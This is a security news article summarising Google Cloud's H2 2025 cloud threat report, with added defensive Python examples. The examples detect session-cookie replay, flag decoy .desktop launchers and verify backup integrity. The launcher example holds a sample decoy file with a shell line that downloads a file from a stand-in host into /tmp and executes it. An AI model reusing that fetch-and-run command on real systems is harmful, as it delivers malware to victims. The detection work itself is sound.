SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers

Google Cloud warns backup systems face rising cyber threats

Wed, 20th Aug 2025

Google Cloud has published its latest Cloud Threat Horizons Report H2 2025, detailing key trends and findings around cyber threats targeting cloud environments worldwide.

The report draws on analysis conducted by Google Cloud's Office of the CISO, Google Threat Intelligence Group (GTIG), Mandiant Consulting, and internal security teams. It underscores the increasing sophistication of threat actors and the growing risk that organisations face.

Credential compromise and misconfiguration

Analysis indicates that credential-based attacks remain the most prevalent threat vector within cloud ecosystems. According to the report, weak or absent credentials were responsible for 47.1% of recorded cloud incidents during the period under review. Misconfigurations contributed to 29.4% of incidents, while compromises via API or user interface accounted for 11.8%.

The report notes that these figures highlight the persistent vulnerabilities in identity management and system configuration, which malicious actors continue to exploit at scale.

Backup systems under direct attack

One new trend identified is the direct targeting of backup infrastructure by financially motivated threat actors. Google Cloud's security experts observed a pattern of backup system sabotage, including deletion of automated backup routines, data corruption, and manipulation of permissions.

"Financially motivated threat actors have escalated tactics, sabotaging backup systems by deleting routines, corrupting data, and manipulating permissions to disrupt recovery and force ransom payouts."

Such activity is intended to hinder organisations from recovering after an incident, increasing the leverage available to attackers in extortion attempts.

MFA bypass by social engineering

The report outlines the emergence of advanced social engineering campaigns that result in multi-factor authentication (MFA) bypass. These attacks rely on techniques such as credential theft and session cookie hijacking: a session cookie is issued only after MFA has already succeeded, so an attacker who steals it can reuse the authenticated session without ever being challenged for a second factor.

A particular focus is given to groups aligned with North Korea. The report singles out UNC4899, also known as TraderTraitor, for its efforts targeting cryptocurrency platforms.

"Sophisticated social engineering attacks are enabling MFA bypass, including credential and session cookie theft - especially by North Korea-aligned group UNC4899 (TraderTraitor) targeting crypto-asset platforms."
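One control against the cookie-theft variant of MFA bypass described above is session binding: remember the client fingerprint observed on the request that completed MFA, and force re-authentication when the same cookie later arrives with a different one. The following is an added example, not code from the Threat Horizons report or from Google Cloud; the log records, field names and the fingerprint definition (source /24 plus User-Agent) are constructed assumptions.

```python
"""Session binding as a control against MFA bypass via cookie theft.

Added example; not code from the Threat Horizons report or from Google
Cloud. Once a user has completed MFA, the server trusts the session cookie
alone, so an attacker who steals that cookie never sees an MFA prompt.
Binding the session to the client fingerprint observed when MFA succeeded,
and forcing re-authentication when the same cookie arrives with a
different fingerprint, turns the stolen cookie into an alert instead of a
silent login. The log records and field names below are constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    ts: int                      # epoch seconds
    session_id: str              # value of the session cookie
    ip: str
    user_agent: str
    mfa_completed: bool = False  # True for the request that finished MFA


def fingerprint(r: Request) -> tuple:
    """/24 of the source IP plus User-Agent.

    Coarse enough to survive a laptop changing DHCP lease, tight enough
    that a cookie replayed from attacker infrastructure stands out.
    """
    network = ".".join(r.ip.split(".")[:3])
    return (network, r.user_agent)


def detect_session_replay(requests):
    """Return (session_id, ts, reason) for every request that must re-auth.

    A session is bound to the fingerprint seen on its MFA-completion
    request; any later request carrying that session id from a different
    fingerprint, or a session id that never completed MFA, is flagged.
    """
    bound = {}
    alerts = []
    for r in sorted(requests, key=lambda x: x.ts):
        fp = fingerprint(r)
        if r.mfa_completed:
            bound[r.session_id] = fp
            continue
        if r.session_id not in bound:
            alerts.append((r.session_id, r.ts, "session never completed MFA"))
        elif bound[r.session_id] != fp:
            alerts.append((r.session_id, r.ts,
                           f"fingerprint changed {bound[r.session_id]} -> {fp}"))
    return alerts


# Constructed traffic: a legitimate login, then the same cookie replayed
# from a different network with a scripted client.
CHROME = "Mozilla/5.0 (Macintosh) Chrome/128.0"
SAMPLE_REQUESTS = [
    Request(1000, "sess-7f3a", "203.0.113.10", CHROME, mfa_completed=True),
    Request(1060, "sess-7f3a", "203.0.113.10", CHROME),   # normal browsing
    Request(1120, "sess-7f3a", "203.0.113.44", CHROME),   # same /24, fine
    Request(1800, "sess-7f3a", "198.51.100.77", "python-requests/2.32"),  # replay
    Request(1900, "sess-0000", "198.51.100.77", "python-requests/2.32"),  # forged
]

if __name__ == "__main__":
    for sid, ts, reason in detect_session_replay(SAMPLE_REQUESTS):
        print(f"{ts} {sid}: {reason}")
```

Running the block flags only the two requests at 1800 and 1900: the replayed cookie from the new network and the session id that never passed MFA. The request from 203.0.113.44 is accepted because it stays inside the bound /24; a production deployment would tune that width, and typically also re-bind after a successful re-authentication rather than keeping the old fingerprint.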

Abuse of trusted cloud services

The report highlights increased abuse of mainstream cloud and code-hosting services for malware delivery. Attackers are reported to be hosting decoy files on platforms including Google Drive, GitHub, and Dropbox; the example given is .desktop files disguised as PDFs. A .desktop file is a Linux application launcher whose Exec= line runs when the file is opened, so a launcher given a PDF name and icon appears as a document in the file manager but triggers a silent malware download in the background when the victim opens it.

"Attackers increasingly exploit platforms like Google Drive, GitHub, Dropbox, and others to host decoy files (e.g., .desktop files masquerading as innocuous PDFs) that trigger background malware downloads."

Such activity makes detection more complex due to the abuse of otherwise trusted platforms.
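The decoy-launcher technique described above can be triaged from the file content alone, because a .desktop file is plain INI-style text. The script below is an added example, not code from the report or from Google Cloud: it parses the [Desktop Entry] group and scores launchers whose Name or Icon claims to be a document while Exec downloads and runs something. The indicator regexes, weights, threshold and both sample launchers are constructed for illustration.

```python
"""Triage Linux .desktop launchers that masquerade as documents.

Added example; not code from the Threat Horizons report or from Google
Cloud. A .desktop file is an INI-style launcher: when the desktop
environment "opens" it, the command on its Exec= line runs. The decoy
pattern gives the launcher a PDF-like Name and Icon so the file manager
renders it as a document while Exec fetches and runs a payload. The
heuristics, weights and sample launchers here are constructed.
"""
import re
from dataclasses import dataclass, field

# Indicators (illustrative regexes, not an exhaustive signature set).
DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\s*$", re.I)
DOC_ICON = re.compile(r"pdf|document|word|excel|libreoffice", re.I)
DOWNLOADER = re.compile(r"\b(curl|wget|fetch)\b")
INLINE_SHELL = re.compile(r"\b(ba|z|da)?sh\s+-c\b|\bpython3?\s+-c\b|\bperl\s+-e\b")
STAGING_DIR = re.compile(r"/(tmp|var/tmp|dev/shm)/")
OBFUSCATION = re.compile(r"\bbase64\b|\beval\b|\\x[0-9a-fA-F]{2}")


@dataclass
class Finding:
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points, reason):
        self.score += points
        self.reasons.append(reason)


def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group.

    Localised keys such as Name[de] fall back onto the base key only when
    the unlocalised key is absent; lines without '=' are ignored.
    """
    entry = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if not in_group or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        base = key.split("[", 1)[0]
        if base == key or base not in entry:
            entry[base] = value
    return entry


def triage(text):
    """Score one launcher; is_decoy_dropper() applies the threshold."""
    entry = parse_desktop_entry(text)
    f = Finding()
    exec_cmd = entry.get("Exec", "")
    looks_like_document = bool(DOC_NAME.search(entry.get("Name", ""))
                               or DOC_ICON.search(entry.get("Icon", "")))
    if looks_like_document and entry.get("Type") == "Application":
        f.add(2, "document-like Name/Icon on an Application launcher")
    if DOWNLOADER.search(exec_cmd):
        f.add(2, "Exec downloads content from the network")
        if entry.get("Terminal", "false").lower() == "false":
            f.add(1, "download runs without a visible terminal")
    if INLINE_SHELL.search(exec_cmd):
        f.add(1, "Exec passes an inline script to an interpreter")
    if STAGING_DIR.search(exec_cmd):
        f.add(1, "Exec writes to or runs from a staging directory")
    if OBFUSCATION.search(exec_cmd):
        f.add(1, "Exec contains encoding/eval indicators")
    return f


def is_decoy_dropper(text):
    return triage(text).score >= 4


# Constructed samples (hostnames use the reserved .invalid TLD).
DECOY_LAUNCHER = """\
[Desktop Entry]
Type=Application
Name=Invoice_August_2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL https://files.example.invalid/dl -o /tmp/.cache-x; chmod +x /tmp/.cache-x; /tmp/.cache-x & xdg-open https://files.example.invalid/decoy.pdf"
"""

BENIGN_LAUNCHER = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Name[de]=Texteditor
Icon=org.gnome.TextEditor
Exec=gnome-text-editor %U
Terminal=false
Categories=Utility;TextEditor;
"""

if __name__ == "__main__":
    for label, launcher in (("decoy", DECOY_LAUNCHER), ("benign", BENIGN_LAUNCHER)):
        result = triage(launcher)
        print(f"{label}: score={result.score} -> {result.reasons}")
```

The decoy sample scores 7 (document-like name, network download with no terminal, inline shell, staging under /tmp) and the editor launcher scores 0. The trailing `xdg-open` of a real PDF is what makes the lure convincing to the victim, so the scoring deliberately keys on what runs before it rather than on the document being shown.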

Evolving persistence and evasion techniques

The publication describes a shift in threat actor tactics towards advanced evasion and persistence strategies. These include efforts to compromise the integrity of recovery chains and software supply chains, threatening not just data but the infrastructure designed to support post-incident recovery.

Expert recommendations

Google Cloud security experts emphasise a multi-layered defence approach. Recommendations include strengthening identity and access management practices, prioritising least-privilege principles, enforcing robust credential hygiene, and implementing credential leak detection mechanisms.

The report advocates for isolating recovery environments to counter backup sabotage. For instance, Cloud Isolated Recovery Environments (CIRE) can provide additional protection for backup data and help ensure recovery capabilities remain intact after an attack.
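The three forms of backup sabotage described under "Backup systems under direct attack" (deleted backups, corrupted data, manipulated permissions) are all detectable from inside an isolated recovery environment if that environment holds an independent, signed record of what the backup set should look like. The following is an added example, not code from the report or from any Google Cloud product: a plain HMAC-signed manifest of file hashes and permission bits, verified before a restore. The directory layout, key and sabotage scenario in demo() are constructed.

```python
"""Verify a backup set against an out-of-band, HMAC-signed manifest.

Added example; not code from the Threat Horizons report or from any Google
Cloud product. The report describes attackers deleting backups, corrupting
them and changing their permissions so that recovery fails. A signed
manifest of hashes and modes, with the signing key held only in the
isolated recovery environment, lets that environment detect all three
kinds of sabotage before a restore is attempted. The scenario in demo()
is constructed in a temporary directory.
"""
import hashlib
import hmac
import json
import os
import stat
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, key):
    """Record sha256 and permission bits for every file under root, then
    sign the canonical JSON so a tampered manifest is itself detectable."""
    entries = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            entries[rel] = {
                "sha256": sha256_file(path),
                "mode": oct(stat.S_IMODE(os.stat(path).st_mode)),
            }
    body = json.dumps(entries, sort_keys=True).encode()
    return {"body": body, "mac": hmac.new(key, body, "sha256").hexdigest()}


def verify_backups(root, manifest, key):
    """Return (path, problem) findings; an empty list means the set is intact."""
    expected_mac = hmac.new(key, manifest["body"], "sha256").hexdigest()
    if not hmac.compare_digest(expected_mac, manifest["mac"]):
        return [("<manifest>", "signature mismatch: manifest was altered")]
    findings = []
    for rel, meta in json.loads(manifest["body"]).items():
        path = os.path.join(root, rel)
        if not os.path.exists(path):
            findings.append((rel, "deleted"))
            continue
        if sha256_file(path) != meta["sha256"]:
            findings.append((rel, "corrupted"))
        mode = oct(stat.S_IMODE(os.stat(path).st_mode))
        if mode != meta["mode"]:
            findings.append((rel, f"permissions changed {meta['mode']} -> {mode}"))
    return findings


def demo():
    """Constructed scenario: sign three backups, then sabotage each differently."""
    key = b"held-only-inside-the-isolated-recovery-environment"
    with tempfile.TemporaryDirectory() as root:
        paths = [os.path.join(root, f"db-{i}.bak") for i in range(3)]
        for i, path in enumerate(paths):
            with open(path, "wb") as fh:
                fh.write(b"snapshot %d" % i)
            os.chmod(path, 0o600)
        manifest = build_manifest(root, key)
        assert verify_backups(root, manifest, key) == []  # clean baseline

        os.remove(paths[0])                        # backup output deleted
        with open(paths[1], "ab") as fh:           # data corrupted
            fh.write(b"\x00garbage")
        os.chmod(paths[2], 0o666)                  # permissions manipulated
        return sorted(verify_backups(root, manifest, key))


if __name__ == "__main__":
    for rel, problem in demo():
        print(f"{rel}: {problem}")
```

The manifest check runs first on purpose: an attacker with write access to the backup store can rewrite both the data and an unsigned manifest, so the verification is only as good as the key staying outside the compromised environment, which is exactly what an isolated recovery environment is meant to guarantee.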

Vigilance for signs of threat activity is also recommended, in particular the hosting of decoy files on trusted cloud services and attempts to bypass MFA through stolen credentials or session cookies.

Addressing supply chain risk and developer ecosystem security is identified as a further requirement. Google Cloud recommends validation mechanisms - such as Verified CRX Upload for Chrome extensions - as a means of preventing malicious software updates within cloud ecosystems.

Shifting strategic priorities for defenders

The report argues that as organisations increasingly transition to cloud-native environments, attackers have adapted their playbook in response, treating recovery and backup systems as primary objectives. Companies therefore need to harden not only their data but also the infrastructure they would rely on to recover it.

"The report underscores that recovery systems are now primary targets, signalling an urgent need for stronger defensive posture across identity, access, and infrastructure resilience."

Google Cloud's Cloud Threat Horizons Report H2 2025 is intended to give security leaders and practitioners intelligence-backed insights so they can respond proactively to these developing threats with appropriate mitigations and defences.